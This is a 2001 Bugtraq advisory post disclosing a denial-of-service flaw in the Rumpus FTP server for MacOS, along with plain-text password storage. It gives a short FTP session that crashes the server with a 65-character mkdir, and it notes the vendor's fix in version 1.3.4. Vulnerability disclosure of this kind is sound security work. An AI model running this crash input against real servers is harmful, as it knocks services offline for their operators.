[20640] in bugtraq
Rumpus FTP DoS
daemon@ATHENA.MIT.EDU (Jass Seljamaa)
Tue May 15 20:05:09 2001
To: BUGTRAQ@securityfocus.com
Message-ID: <989947358.3b0165ded7df8@email.isp.ee>
Date: Tue, 15 May 2001 19:22:38 +0200 (EET)
From: Jass Seljamaa <jass@email.isp.ee>
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 8bit
Maxum(maxum.com) Rumpus FTP server DoS vulnerability
Versions Affected: tested on v1.3.3, 2.0 dev 3(MacOS 8.6, 9.1), probably
earlier,
Not affected: v1.3.4
Description:
If you try to make a directory which name is 65 characters long, the
Rumpus FTP service and the computer freezes. You can try to force
Rumpus to quit, but it never worked for me(always crashed when I
pressed the \'Force quit\' button). Also, the passwords are stored in plain
text(in prefs folder, a file called \'Rumpus User Database\'), as in most
macintosh programs, Maxum Support said to think about encrypting
passwords in newer versions.
Exploit:
ftp 192.168.0.1
user anonymous
pass an@nymo.us
mkdir
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa
Solution:
Vendor contacted, fixed in version 1.3.4.
Jass Seljamaa,
jass@isp.ee
05212242
-------------------------------------------------
This mail sent through IMP: email.isp.ee
